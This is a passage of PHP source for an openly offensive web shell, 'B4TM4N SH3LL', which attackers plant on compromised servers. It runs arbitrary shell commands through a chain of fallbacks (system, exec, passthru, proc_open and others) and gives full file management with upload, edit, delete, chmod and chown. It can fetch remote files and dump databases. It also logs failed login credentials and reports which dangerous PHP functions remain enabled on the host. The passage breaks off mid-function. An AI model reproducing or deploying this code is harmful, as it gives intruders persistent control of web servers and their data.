"B4TM4N SH3LL", // Your Title "tagline" => "by k4mpr3t", // Your Tagline "debug" => false // Debug Mode ); $account=explode(':',$x_); session_start(); // Session Start function any($x,$y) { return array_key_exists($x,$y); } function urle($x) { return B64E(urlencode($x)); } function urld($x) { return urldecode(B64D(urldecode($x))); } define('_',DIRECTORY_SEPARATOR); foreach($_SERVER as $k => $v) { define(strtolower($k),$_SERVER[$k]); } function B64E($x) { $d="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; $c="ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba9876543210+/"; return strtr(base64_encode($x),$d,$c); } function B64D($x) { $d="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; $c="ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba9876543210+/"; return base64_decode(strtr($x,$d,$c)); } // Login Request if(request_method=="POST") { if(any("username",$_REQUEST)&&any("password",$_REQUEST)&&any("signin",$_REQUEST)) { if((B64E($_REQUEST['username'])==$account[0])&&(sha1(md5($_REQUEST['password']))==$account[1])) { session_regenerate_id(); $_SESSION['action']=array( "username" => B64E($_REQUEST['username']), "password" => sha1(md5($_REQUEST['password'])) ); } else { $log=array( "Username: ".$_REQUEST['username'], "Password: ".$_REQUEST['password'], "Remote IP: ".remote_addr, "Time: ".date('Y-m-d H:i:s'), "-------------------------\r\n", ); $file=dirname(__FILE__)._.'.log'; $write_log=implode($log,"\r\n"); $op=fopen($file,'a+'); fwrite($op,$write_log); fclose($op); } } } if(!any("action",$_SESSION)) { ?> Signin

Please sign in

©

<?=$title?>
".$x."&1'; if(!is_null($backtic=`$x`)) { return $backtic; } elseif(function_exists('system')) { ob_start(); $system=system($x); $buff=ob_get_contents(); ob_end_clean(); return $buff; } elseif(function_exists('exec')) { $buff=""; exec($x,$results); foreach($results as $result) { $buff.=$result; } return $buff; } elseif(function_exists('shell_exec')) { $buff=shell_exec($x); return $buff; } elseif(function_exists('pcntl_exec')) { $buff=pcntl_exec($x); return $buff; } elseif(function_exists('passthru')) { ob_start(); $passthru=passthru($x); $buff=ob_get_contents(); ob_end_clean(); return $buff; } elseif(function_exists('proc_open')) { $proc=proc_open($x,array( array("pipe","r"), array("pipe","w"), array("pipe","w") ),$pipes); $buff=stream_get_contents($pipes[1]); return $buff; } elseif(function_exists('popen')) { $buff=""; $pop=popen($x,"r"); while(!feof($pop)) { $buff.=fread($pop,1024); } pclose($pop); return $buff; } return "R.I.P Command"; } function Remove($x) { if(is_dir($x)) { if($h=@opendir($x)) { while(false!==($f=readdir($h))) { if($f!="."&&$f!="..") { Remove($x._.$f); } } closedir($h); } return rmdir($x); } elseif(is_file($x)) { return unlink($x); } return false; } function ChmodRecursive($x,$y) { if(is_dir($x)) { if($h=@opendir($x)) { while(false!==($f=readdir($h))) { if($f!="."&&$f!="..") { ChmodRecursive($x._.$f); } } closedir($h); } return chmod($x,$y); } elseif(is_file($x)) { return chmod($x,$y); } return false; } function CopyRecursive($x,$y) { if(is_dir($x)) { @mkdir($y); if($h=@opendir($x)) { while(false!==($f=readdir($h))) { if($f!="."&&$f!="..") { CopyRecursive($x._.$f,$y._.$f); } } closedir($h); } return true; } elseif(is_file($x)) { return copy($x,$y); } return false; } function MoveRecursive($x,$y) { if(is_dir($x)) { @mkdir($y); if($h=@opendir($x)) { while(false!==($f=readdir($h))) { if($f!="."&&$f!="..") { MoveRecursive($x._.$f,$y._.$f); } } closedir($h); } return Remove($x); } elseif(is_file($x)) { if(copy($x,$y)) { return unlink($x); } } return false; } function GetDownloadUrl($x,$y) { global $agent; $fl=fopen($y,"w"); $ch=curl_init(); curl_setopt($ch,CURLOPT_USERAGENT,$agent); curl_setopt($ch,CURLOPT_URL,$x); curl_setopt($ch,CURLOPT_FILE,$fl); curl_setopt($ch,CURLOPT_HEADER,0); curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,0); curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0); curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1); $rs=curl_exec($ch); if(curl_error($ch)) return curl_error($ch); curl_close($ch); fclose($fl); return true; } function GetUrlExists($x) { global $agent; $ch=curl_init(); curl_setopt($ch,CURLOPT_USERAGENT,$agent); curl_setopt($ch,CURLOPT_URL,$x); curl_setopt($ch,CURLOPT_TIMEOUT,5); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,5); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); $rs=curl_exec($ch); $http=curl_getinfo($ch,CURLINFO_HTTP_CODE); if(curl_error($ch)) return curl_error($ch); curl_close($ch); return ($http>=200 && $http<300); } function GetUrlContent($x) { global $agent; $ch=curl_init(); curl_setopt($ch,CURLOPT_USERAGENT,$agent); curl_setopt($ch,CURLOPT_URL,$x); curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,0); curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); $rs=curl_exec($ch); if(curl_error($ch)) return curl_error($ch); curl_close($ch); return $rs; } function GetUrlFromPath($x) { $fix_path=str_replace(_,'/',$x); $protocol=empty($_SERVER['HTTPS'])||$_SERVER['HTTPS']==='off'?'http://':'https://'; $path=str_replace(document_root,'',$fix_path); return $protocol.server_name.$path; } function PostUrlContent($url,$content) { global $agent; $params=array( 'http' => array( 'method' => "POST", 'header' => "Content-Type: application/x-www-form-urlencoded\r\n". "User-Agent: $agent\r\n", 'content' => http_build_query($content) ) ); $results=""; $context=stream_context_create($params); $header=get_headers($url); if($http=substr($header[0],9,3) != "200") { $results="Error: $http"; } else { //file_get_contents if($contents=file_get_contents($url,null,$context)) { $results=htmlspecialchars($contents); } //stream_get_contents if($handle=fopen($url,'r',false,$context)) { $contents=stream_get_contents($handle); fclose($handle); $results=htmlspecialchars($contents); } //fopen if($handle=fopen($url,'r',false,$context)) { $contents=""; while(!feof($handle)) { $contents.=fread($handle,10240); } fclose($handle); $results=htmlspecialchars($contents); } } return $results; } function GetFileType($x) { if(is_file($x)) { return end(explode(".",end(explode(_,$x)))); } elseif(is_dir($x)) { return "dir"; } elseif(is_link($x)) { return "link"; } else { return "-"; } } function GetFileTime($x,$y) { switch($y) { case "create":return date("Y-m-d H:i:s",@filectime($x));break; case "modify":return date("Y-m-d H:i:s",@filemtime($x));break; case "access":return date("Y-m-d H:i:s",@fileatime($x));break; } } function GetFilePerm($x) { $perms=@fileperms($x); switch ($perms & 0xF000) {case 0xC000:$info='s';break;case 0xA000:$info='l';break; case 0x8000:$info='r';break;case 0x6000:$info='b';break; case 0x4000:$info='d';break;case 0x2000:$info='c';break; case 0x1000:$info='p';break;default:$info='u';} $info .=(($perms & 0x0100)?'r':'-');$info .=(($perms & 0x0080)?'w':'-'); $info .=(($perms & 0x0040)?(($perms & 0x0800)?'s':'x' ):(($perms & 0x0800)?'S':'-')); $info .=(($perms & 0x0020)?'r':'-');$info .=(($perms & 0x0010)?'w':'-'); $info .=(($perms & 0x0008)?(($perms & 0x0400)?'s':'x' ):(($perms & 0x0400)?'S':'-')); $info .=(($perms & 0x0004)?'r':'-');$info .=(($perms & 0x0002)?'w':'-'); $info .=(($perms & 0x0001)?(($perms & 0x0200)?'t':'x' ):(($perms & 0x0200)?'T':'-')); return sprintf('%s [%s]',$info,substr(decoct($perms),2)); } function GetFileSize($x) { $x=abs($x); $size=array('B','KB','MB','GB','TB','PB','EB','ZB','YB'); $exp=$x?floor(log($x)/log(1024)):0; return sprintf('%.2f '.$size[$exp],($x/pow(1024,floor($exp)))); } function GetUser($x) { if(function_exists('posix_getpwuid')&&function_exists('posix_getgrgid')) { $uid=posix_getpwuid(posix_getuid()); $gid=posix_getgrgid(posix_getgid()); switch($x) { case 'usr':return $uid['name'];break; case 'uid':return $uid['uid'];break; case 'grp':return $gid['name'];break; case 'gid':return $gid['gid'];break; } } else { switch($x) { case 'usr':return get_current_user();break; case 'uid':return getmyuid();break; case 'grp':return "?";break; case 'gid':return getmygid();break; } } } function GetOwnerGroup($x) { if(Unix()) { if(function_exists('posix_getpwuid')&&function_exists('posix_getgrgid')) { $user=posix_getpwuid(fileowner($x)); $group=posix_getgrgid(filegroup($x)); return sprintf('%s:%s',$user['name'],$group['name']); } } return "?:?"; } function GetFileOwnerGroup($x) { if(Unix()) { if(function_exists('posix_getpwuid')&&function_exists('posix_getgrgid')) { $user=posix_getpwuid(fileowner($x)); $group=posix_getgrgid(filegroup($x)); return sprintf('%s:%s/%s:%s',$user['name'],$user['uid'],$group['name'],$group['gid']); } } return "?:?/?:?"; } function GetSafeMode() { if(strtolower(ini_get("safe_mode"))=='on') { $safemod="ON"; } else { $safemod="OFF"; } return $safemod; } function MapDirectory($x) { $map=""; $d=str_replace("\\",_,$x); if(empty($d)) { $d=realpath("."); } elseif(realpath($d)) { $d=realpath($d); } $d=str_replace("\\",_,$d); if(substr($d,-1)!=_) { $d.=_; } $d=str_replace("\\\\","\\",$d); $pd=$e=explode(_,substr($d,0,-1)); $i=0; foreach($pd as $b) { $t=""; $j=0; foreach($e as $r) { $t.=$r._; if($j==$i) { break; } $j++; } $map.="".htmlspecialchars($b).""._; $i++; } return rtrim($map,_); } function MapDrive($x) { if(!Unix()) { $v=explode("\\",$x); $v=$v[0]; $l=""; foreach(range("A","Z") as $lt) { $drive=is_dir($lt.":\\"); if($drive) { $l.="["; if(strtolower($lt.':')!=strtolower($v)) { $l.=$lt; } else { $l.="".$lt.""; } $l.="]"; } } return $l; } } function MainMenu() { $menu=array( "ExpL" => "?d=".urle(getcwd()), "★ Sec." => "?x=secure", "Info" => "?x=info", "Database" => "?x=db", "Terminal" => "?x=terminal", "Connect" => "?x=connect", ".Htaccess" => "?x=htaccess", "PHP" => "?x=php", "Perl/CGI" => "?x=perl", "Mail" => "?x=mail", "Process" => "?x=process", "Shells" => "?x=shells", "Symlink" => "?x=symlink", "♛ Tools" => "?z", "Account" => "?x=account", "Update" => "?x=update", "Logout" => "?x=logout" ); $nu=""; foreach($menu as $key => $val) { $idxkey=substr($val,1,1); $idxval=substr($val,3); $active=any($idxkey,$_REQUEST)&&$_REQUEST[$idxkey]==$idxval?"class='active'":""; if($key=="Logout") { $nu.="
  • ".$key."
  • "; } else { $nu.="
  • ".$key."
  • "; } } return $nu; } function MenuTools($x) { global $menu_tools; $ol=""; return $ol; } printf("
    ", php_uname(),server_software, server_name,server_name,gethostbyname(http_host),server_port, B64D($account[0]),remote_addr,remote_port, GetUser("usr"),GetUser("uid"),GetUser("grp"),GetUser("gid"), GetFileSize(@disk_free_space($dir)),GetFileSize(@disk_total_space($dir)), php_sapi_name(),GetSafeMode(),php_self,$config['title'],$config['tagline'], MainMenu(),MapDrive($map),MapDirectory($map),$map ); if(any("g",$_REQUEST)) { $g=$_REQUEST['g']; if (is_dir($g)) { header('location:'.php_self.'?d='.urle($g)); } elseif(is_file($g)||is_link($g)) { header('location:'.php_self.'?a=v&r='.urle($g)); } else { header('location:'.php_self); } } if(any("d",$_REQUEST)||request_uri===script_name) { $_SESSION['c']=urle($dir); if(any("file",$_REQUEST)&&$_REQUEST['file']=="New File") { $file=trim($dir._.$_REQUEST['what']); if(file_exists($file)) { printf("
    Can't create New File!
    "); } else { $mf=@fopen($file,"w"); fclose($mf); header("location:".php_self."?a=e&r=".urle($file)); } } if(any("directory",$_REQUEST)&&$_REQUEST['directory']=="New Dir") { $dire=trim($_REQUEST['what']); @chdir($dir); if(!@mkdir($dire)) { printf("
    Can't create New Directory!
    "); } else { printf("
    Directory '%s' Created on %s
    ",$dire,GetFileTime($dir._.$dire,'create')); } } if(any("upload",$_REQUEST)&&$_REQUEST['upload']=="Upload") { $upload=$dir._.trim(basename($_FILES["what"]["name"])); if(move_uploaded_file($_FILES["what"]["tmp_name"],$upload)) { printf("
    File %s has been uploaded
    ",basename($_FILES["what"]["name"])); } else { printf("
    ✕ Can't upload new file! ✕
    "); } } if($handle=@opendir($dir)) { $reads=array(); $count_dirs=0; $count_files=0; while(false!==($file=readdir($handle))) { $filedir=rtrim($dir,_)._.$file; $updir=substr($dir,0,strrpos($dir,_)); if (strlen($updir)<=2) $updir=$updir._; $type=GetFileType($filedir); $size=GetFileSize(@filesize($filedir)); $last=GetFileTime($filedir,"modify"); $perm=GetFilePerm($filedir); $owner=GetOwnerGroup($filedir); $mime=@mime_content_type($filedir); $view=""; if(strpos($mime,'image')!==false) { $view="?a=v&w=i&r=".urle($filedir); } elseif(strpos($mime,'video')!==false) { $view="?a=v&w=v&r=".urle($filedir); } elseif(strpos($mime,'audio')!==false) { $view="?a=v&w=a&r=".urle($filedir); } else { $view="?a=v&r=".urle($filedir); } if($file==".") { $reads[]="
    .
    ".$type."
    ".$size."
    ".$perm."
    ".$owner."
    ".$last."
    "; } elseif($file=="..") { $reads[]="
    ".$file."
    ".$type."
    ".$size."
    ".$perm."
    ".$owner."
    ".$last."
    "; } else { if($type=="dir") { $reads[]="
    ".$file."
    ".$type."
    ".$size."
    ".$perm."
    ".$owner."
    ".$last."
    "; $count_dirs++; } else { $reads[]="
    ".$file."
    ".$type."
    ".$size."
    ".$perm."
    ".$owner."
    ".$last."
    "; $count_files++; } } } sort($reads); $filesdirs=""; foreach($reads as $read) { $filesdirs.=$read; } printf("
    %s
    Name Type Size Perms Owner:Group Modified Act.
    [0] Selected | Dir's: [%s] File's: [%s]
    ", urle($dir), urle($dir), urle($dir), $filesdirs, $count_dirs, $count_files ); closedir($handle); } else { print "
    Can't Open Location
    "; } } if(any("r",$_REQUEST)) { if(file_exists(urld($_REQUEST["r"]))) { $file=strval(urld($_REQUEST["r"])); $status=any("status",$_SESSION)?$_SESSION['status']:""; $back=php_self."?d=".urle($dir); printf("
    Name%s
    Size%s
    Permission%s
    Create time%s
    Last modified%s
    Last accessed%s
    MIME%s
    Owner/Group%s
    MD5%s
    SHA1%s
    ", basename($file), GetFileSize(@filesize($file)), GetFilePerm($file), GetFileTime($file,"create"), GetFileTime($file,"modify"), GetFileTime($file,"access"), mime_content_type($file), GetFileOwnerGroup($file), @md5_file($file), @sha1_file($file) ); if(is_file($file)||is_link($file)) { $menu=array( "Back" => "?a=b&r=", "Edit" => "?a=e&r=", "View" => "?a=v&r=", "Copy" => "?a=cp&r=", "Move" => "?a=mv&r=", "Download" => "?a=d&r=", "Hexdump" => "?a=h&r=", "Chmod" => "?a=c&r=", "Chown" => "?a=cwn&r=", "Chgrp" => "?a=cgp&r=", "Touch" => "?a=t&r=", "Rename" => "?a=r&r=", "Delete" => "?a=x&r=" ); } elseif(is_dir($file)) { $menu=array( "Back" => "?a=b&r=", "Chmod" => "?a=c&r=", "Chown" => "?a=cwn&r=", "Chgrp" => "?a=cgp&r=", "Touch" => "?a=t&r=", "Rename" => "?a=r&r=", "Delete" => "?a=x&r=" ); } $nu=""; foreach($menu as $key => $val) { $idxkey=substr($val,1,1); $idxval=substr($val,3,strpos($val,'&')-3); $active=any($idxkey,$_REQUEST)&&$_REQUEST[$idxkey]==$idxval?"class='active'":""; if($key=="Delete") { $nu.="
  • ".$key."
  • "; } elseif($key=="Back") { $nu.="
  • ".$key."
  • "; } else { $nu.="
  • ".$key."
  • "; } } printf("",$nu); if($_REQUEST['a']=='e') { $source=""; if(filesize($file) > 5242880) { $source.="Lazy to Read more than 5MB Files"; } else { $open=fopen($file,'r'); if($open) { while(!feof($open)) { $source.=htmlentities(fread($open,(1024*4))); } fclose($open); } } printf("
    ",$source,$status); if(any("status",$_SESSION)) unset($_SESSION['status']); if(any("save",$_REQUEST)) { $new_source=$_REQUEST['sourcecode']; if(function_exists("chmod")) chmod($file,0755); $source_edit=fopen($file,'w+'); $tulis=fwrite($source_edit,$new_source); fclose($source_edit); if($tulis) { $_SESSION['status']="File Saved ! ".GetFileTime($file,"modify")." | ".GetFileSize(filesize($file)); } else { $_SESSION['status']="Whoops, something went wrong..."; } header("location:".php_self."?a=e&r=".urle($file)); } } if($_REQUEST['a']=='r') { printf("
    ",basename($file),$status); if(any("status",$_SESSION)) unset($_SESSION['status']); if(any("rename",$_REQUEST)) { $path=pathinfo(trim($file)); $newname=$path['dirname']._.trim($_REQUEST['name']); if(!rename(trim($file),$newname)) { $_SESSION['status']='Whoops, something went wrong...'; } else { $_SESSION['status']='Renamed file with success'; } header("location:".php_self."?a=r&r=".urle($newname)); } } if($_REQUEST['a']=='c') { printf("
    ",substr(decoct(fileperms($file)),2),$status); if(any("status",$_SESSION)) unset($_SESSION['status']); if(any("chmod",$_REQUEST)) { $octal=octdec($_REQUEST['octal']); if(!chmod(trim($file),$octal)) { $_SESSION['status']='Whoops, something went wrong...'; } else { $_SESSION['status']='Chmod file with success'; } header("location:".php_self."?a=c&r=".urle($file)); } } if($_REQUEST['a']=='cwn') { $own=''; if(function_exists('posix_getpwuid')) { $user=posix_getpwuid(fileowner($x)); $own=$user['name']; } printf("
    ",$own,$status); if(any("status",$_SESSION)) unset($_SESSION['status']); if(any("chown",$_REQUEST)) { $own=$_REQUEST['own']; if(!chown(trim($file),$own)) { $_SESSION['status']='Whoops, something went wrong...'; } else { $_SESSION['status']='Chown file with success'; } header("location:".php_self."?a=cwn&r=".urle($file)); } } if($_REQUEST['a']=='cgp') { $grp=''; if(function_exists('posix_getgrgid')) { $group=posix_getgrgid(filegroup($x)); $grp=$group['name']; } printf("
    ",$grp,$status); if(any("status",$_SESSION)) unset($_SESSION['status']); if(any("chgrp",$_REQUEST)) { $grp=$_REQUEST['grp']; if(!chgrp(trim($file),$grp)) { $_SESSION['status']='Whoops, something went wrong...'; } else { $_SESSION['status']='Chgrp file with success'; } header("location:".php_self."?a=cgp&r=".urle($file)); } } if($_REQUEST['a']=='t') { printf("
    ",GetFileTime($file,"modify"),$status); if(any("status",$_SESSION)) unset($_SESSION['status']); if(any("touch",$_REQUEST)) { $time=$_REQUEST['time']; if(!touch(trim($file),strtotime($time))) { $_SESSION['status']='Whoops, something went wrong...'; } else { $_SESSION['status']='Touched file with success'; } header("location:".php_self."?a=t&r=".urle($file)); } } if($_REQUEST['a']=='v') { printf("", urle($file),urle($file), urle($file),urle($file), urle($file)); if(is_readable($file)) { if(any("w",$_REQUEST)) { $url=GetUrlFromPath($file); $type=end(explode(".",$file)); if($_REQUEST['w']=='f') { printf("
    --> New Tab <--
    ",$url,$url); } if($_REQUEST['w']=='i') { printf("
     Not Image
    ",$url); } if($_REQUEST['w']=='v') { printf("
    ",$url,$type); } if($_REQUEST['w']=='a') { printf("
    ",$url,$type); } } else { if(filesize($file) > 5242880) { printf("Lazy to Read more than 5MB Files"); } else { $code=highlight_file($file,true); printf("
    %s
    ",$code); } } } } if($_REQUEST['a']=='h') { $c=file_get_contents($file); $n=0; $h=array('00000000
    ','',''); $len=strlen($c); for($i=0;$i<$len;++$i) { $h[1].=sprintf('%02X',ord($c[$i])).' '; switch(ord($c[$i])) { case 0: $h[2].=' ';break; case 9: $h[2].=' ';break; case 10:$h[2].=' ';break; case 13:$h[2].=' ';break; default:$h[2].=$c[$i];break; } $n++; if($n==32) { $n=0; if($i+1 < $len) { $h[0].=sprintf('%08X',$i+1).'
    '; } $h[1].='
    '; $h[2].="\n"; } } printf("
    %s
    %s
    %s
    ",$h[0],$h[1],htmlspecialchars($h[2])); } if($_REQUEST['a']=='cp'||$_REQUEST['a']=='mv') { printf("
    ",$file,($_REQUEST['a']=='cp'?'Copy':'Move'),$status); if(any("status",$_SESSION)) unset($_SESSION['status']); if(any("submit",$_REQUEST)) { $source=$file; $dest=$_REQUEST['file-dest']; if(!file_exists($dest)) { if ($_REQUEST['a']=='cp') { if(!copy(trim($source),trim($dest))) { $_SESSION['status']='Whoops, cannot copying...'; } else { $_SESSION['status']="Copy file with success '" . basename($dest) . "'"; } } elseif($_REQUEST['a']=='mv') { if(!copy(trim($source),trim($dest))) { $_SESSION['status']='Whoops, cannot moving...'; } else { if(Remove($source)) { $_SESSION['status']="Move file with success"; $file=$dest; } else { $_SESSION['status']='Whoops, just copying...'; } } } } else { $_SESSION['status']="Whoops, File was Exists '" . basename($dest) . "'"; } if($_REQUEST['a']=='cp') { header("location:".php_self."?a=cp&r=".urle($file)); } elseif($_REQUEST['a']=='mv') { header("location:".php_self."?a=mv&r=".urle($file)); } } } if($_REQUEST['a']=='d') { if(file_exists($file)) { header('Cache-Control:must-revalidate,post-check=0,pre-check=0'); header('Content-Disposition:attachment;filename='.basename($file)); header('Content-Type:application/octet-stream'); header('Content-Description:File Transfer'); header('Content-Transfer-Encoding:binary'); header('Content-Length:'.filesize($file)); header('Pragma:public'); header('Expires:0'); ob_clean(); readfile($file); exit; } } if($_REQUEST['a']=='x') { if(file_exists($file)) { if(Remove($file)) { header("location:".$back); } } print 'Cannot Delete'; } } else { print 'File Not Found'; } } if(any("x",$_REQUEST)) { if($_REQUEST['x']=="logout") { session_destroy(); session_regenerate_id(); header('location:'.php_self); } if($_REQUEST['x']=="secure") { $disable_functions=array_filter(array_map('trim',explode(',',ini_get("disable_functions")))); $security=array('_xyec','allow_url_fopen','allow_url_include','apache_child_terminate','apache_get_modules','apache_getenv', 'apache_note','apache_setenv','base64_decode','chdir','chgrp','chmod','chown','curl_exec','curl_multi_exec','dbase_open', 'dbmopen','define_syslog_variables','disk_free_space','disk_total_space','diskfreespace','dl','dlopen','escapeshellarg', 'escapeshellcmd','eval','exec','extract','filepro','filepro_retrieve','filepro_rowcount','fopen_with_path','fp','fput', 'fputs','ftp_connect','ftp_exec','ftp_get','ftp_login','ftp_nb_fput','ftp_put','ftp_raw','ftp_rawlist','geoip_open', 'get_cfg_var','get_current_user','get_num_redirects','getcwd','getenv','getlastmo','getmygid','getmyinode','getmypid', 'getmyuid','getrusage','gzinflate','gzuncompress','highlight_file','hpAds_xmlrpcEncode','ini_alter','ini_get_all', 'ini_restore','ini_set','inject_code','leak','link','listen','mainwork','mb_send_mail','mkdir','mkfifo','move_uploaded_file', 'mysql_list_dbs','mysql_pconnect','openlog','parse_ini_file','passthru','pcntl_alarm','pcntl_exec','pcntl_fork', 'pcntl_get_last_error','pcntl_getpriority','pcntl_setpriority','pcntl_signal','pcntl_signal_dispatch','pcntl_sigprocmask', 'pcntl_sigtimedwait','pcntl_sigwaitinfo','pcntl_strerrorp','pcntl_wait','pcntl_waitpid','pcntl_wexitstatus','pcntl_wifexited', 'pcntl_wifsignaled','pcntl_wifstopped','pcntl_wstopsig','pcntl_wtermsig','pfsockopen','phpAds_XmlRpc','phpAds_remoteInfo', 'phpAds_xmlrpcDecode','phpAds_xmlrpcEncode','php_uname','phpinfo','popen','posix_getgrgid','posix_getlogin','posix_getpwuid', 'posix_kill','posix_mkfifo','posix_setpgid','posix_setsid','posix_setuid','posix_ttyname','posix_uname','posixc','proc_close', 'proc_get_stats','proc_get_status','proc_nice','proc_open','proc_terminate','ps_aux','putenv','readlink','rename','rmdir', 'runkit_function_rename','set_time_limit','sh2_exec','shell_exec','show_source','sleep','socket_accept','socket_bind', 'socket_clear_error','socket_close','socket_connect','socket_create','socket_create_listen','socket_create_pair', 'socket_get_option','socket_getpeername','socket_getsockname','socket_last_error','socket_listen','socket_read', 'socket_recv','socket_recvfrom','socket_select','socket_send','socket_sendto','socket_set_block','socket_set_nonblock', 'socket_set_option','socket_shutdown','socket_strerror','socket_write','str_rot13','stream_select','stream_socket_server', 'symlink','syslog','system','tp_exec','virtual','xmlrpc_entity_decode'); sort($security); $fucks=array_unique(array_merge($disable_functions,$security)); $table=""; $enable=0; $disable=0; $die=array(); $ready=array(); $off=array(); $total=count($fucks); foreach($fucks as $fuck) { $table.="$fuck"; if(in_array($fuck,$disable_functions)) { $table.="
    DIE
    "; $die[]=$fuck; $disable++; } else { if(function_exists($fuck)||is_callable($fuck)) { $table.="
    READY
    "; $ready[]=$fuck; $enable++; } else { $table.="
    OFF
    "; $off[]=$fuck; $disable++; } } $table.=""; } $risk=($enable/$total)*100; $secure=($disable/$total)*100; printf("

    Sec. Info v2.0.%s


    Risks Rate [%s%%] | Secure Rate [%s%%]



    %s
    No. Disable Function Status
    Ready List
    Off List
    Die List
    ",$total,round($risk,2),round($secure,2),$table,implode($ready, ', '),implode($off, ', '),implode($die, ', ')); } if($_REQUEST['x']=="info") { printf("

    "); $cores=array('PHP_VERSION','PHP_MAJOR_VERSION','PHP_MINOR_VERSION','PHP_RELEASE_VERSION','PHP_VERSION_ID', 'PHP_EXTRA_VERSION','PHP_ZTS','PHP_DEBUG','PHP_MAXPATHLEN','PHP_OS','PHP_OS_FAMILY','PHP_SAPI', 'PHP_EOL','PHP_INT_MAX','PHP_INT_MIN','PHP_INT_SIZE','PHP_FLOAT_DIG','PHP_FLOAT_EPSILON', 'PHP_FLOAT_MIN','PHP_FLOAT_MAX','DEFAULT_INCLUDE_PATH','PEAR_INSTALL_DIR','PEAR_EXTENSION_DIR', 'PHP_EXTENSION_DIR','PHP_PREFIX','PHP_BINDIR','PHP_BINARY','PHP_MANDIR','PHP_LIBDIR','PHP_DATADIR', 'PHP_SYSCONFDIR','PHP_LOCALSTATEDIR','PHP_CONFIG_FILE_PATH','PHP_CONFIG_FILE_SCAN_DIR', 'PHP_SHLIB_SUFFIX','PHP_FD_SETSIZE'); $table=""; foreach($cores as $core) { $table.="".$core."".@constant($core).""; } printf("

    Core Predefined Constants


    %s
    Predefined Constants Value
    ",$table); if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="envirolment") { ob_clean(); phpinfo($_REQUEST['config']); $phpinfo=ob_get_contents(); ob_end_clean(); $phpinfo=preg_replace('%^.*(.*).*$%ms','$1',$phpinfo); printf("
    %s
    ",$phpinfo); exit; } } if($_REQUEST['x']=="db") { $connect=any("connect",$_SESSION)?$_SESSION['connect']:""; $status=any("status",$_SESSION)?$_SESSION['status']:""; $query=any("query",$_REQUEST)?$_REQUEST['query']:"show databases;"; if($connect=='true') { $process=""; $sql=mysql_connect($_SESSION['host'],$_SESSION['user'],$_SESSION['pass']); $result=mysql_list_processes($sql); while($row=mysql_fetch_assoc($result)) { $process.=sprintf(" %s%s%s %s%s", $row["Id"],$row["Host"],$row["db"], $row["Command"],$row["Time"]); } mysql_free_result($result); printf("


    %s
    Id Host Database Command Time



    ",$query,$process,$dir,$status); } else { printf("






    "); } if(any("rs",$_REQUEST)) { $_SESSION[$_REQUEST['rs']]=''; } if(any("cd",$_REQUEST)) { $_SESSION['qdb']=$_REQUEST['cd']; } if(any("ct",$_REQUEST)) { $_SESSION['qtb']=$_REQUEST['ct']; } if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="db") { $cn=mysqli_connect($_REQUEST['host'],$_REQUEST['user'],$_REQUEST['pass'],$_REQUEST['dbas'],$_REQUEST['port']); $_SESSION['host']=$_REQUEST['host']; $_SESSION['port']=$_REQUEST['port']; $_SESSION['user']=$_REQUEST['user']; $_SESSION['pass']=$_REQUEST['pass']; $_SESSION['dbas']=$_REQUEST['dbas']; if($cn) { $_SESSION['connect']='true'; header('location:'.php_self.'?x=db'); } else { $_SESSION['connect']='false'; printf("Connection Failed"); } } if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="qry") { $_SESSION['status']=''; $con=mysqli_connect($_SESSION['host'],$_SESSION['user'],$_SESSION['pass'],$_SESSION['dbas'],$_SESSION['port']); if(isset($_REQUEST['disconnect'])) { mysqli_close($con); unset($_SESSION['connect']); unset($_SESSION['query']); unset($_SESSION['host']); unset($_SESSION['user']); unset($_SESSION['pass']); unset($_SESSION['dbas']); unset($_SESSION['qdb']); unset($_SESSION['qtb']); header('location:'.php_self.'?x=db'); } $sql=!empty($_REQUEST['query'])?$_REQUEST['query']:"show databases;"; $result=mysqli_query($con,$sql); $data=array(); $name=array(); if($result) { while($fieldinfo=mysqli_fetch_field($result)) { $name[]=$fieldinfo->name; } $data[]=$name; while($row=mysqli_fetch_row($result)) { $data[]=$row; } mysqli_free_result($result); } else { $data=false; } if($data!==false) { $sqdb=@$_SESSION['qdb']; $sqtb=@$_SESSION['qtb']; $bsdb="Database"; $bqdb=!empty($_SESSION['qdb'])?"→ $sqdb":""; $bqtb=!empty($_SESSION['qtb'])?"→ $sqtb":""; printf("
    %s %s %s
    ",$bsdb,$bqdb,$bqtb); foreach($data as $key => $val) { if(is_array($val)) { if($key==0) { print ""; foreach($val as $key2 => $val2) { if(!is_array($val2)) { print ""; } } print ""; } else { print ""; foreach($val as $key3 => $val3) { if(!is_array($val3)) { if(strpos($val2,'Database')!==false) { print ""; } elseif(strpos($val2,'Tables')!==false) { $val4=substr($val2,strpos($val2,'Tables_in_')+10); print ""; } else { print ""; } } } print ""; } } } print "
    ".$val2."
    $val3$val3$val3
    "; } else { print 'Query not Executed'; } } if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="dmp") { $database=$_REQUEST['database']; $output=$_REQUEST['output']; if (!file_exists($output)&&!empty($database)) { $link=mysqli_connect($_SESSION['host'],$_SESSION['user'],$_SESSION['pass'],null,$_SESSION['port']); mysqli_set_charset($link,'utf8'); mysqli_select_db($link,$database); $tables=array(); $result=mysqli_query($link,'SHOW TABLES'); while($row=mysqli_fetch_row($result)) { $tables[]=$row[0]; } $return='SET FOREIGN_KEY_CHECKS=0;' . "\r\n"; $return.='SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";' . "\r\n"; $return.='SET AUTOCOMMIT=0;' . "\r\n"; $return.='START TRANSACTION;' . "\r\n"; foreach($tables as $table) { $result=mysqli_query($link,'SELECT * FROM '.$table); $num_fields=mysqli_num_fields($result); $num_rows=mysqli_num_rows($result); $i_row=0; $row2=mysqli_fetch_row(mysqli_query($link,'SHOW CREATE TABLE '.$table)); 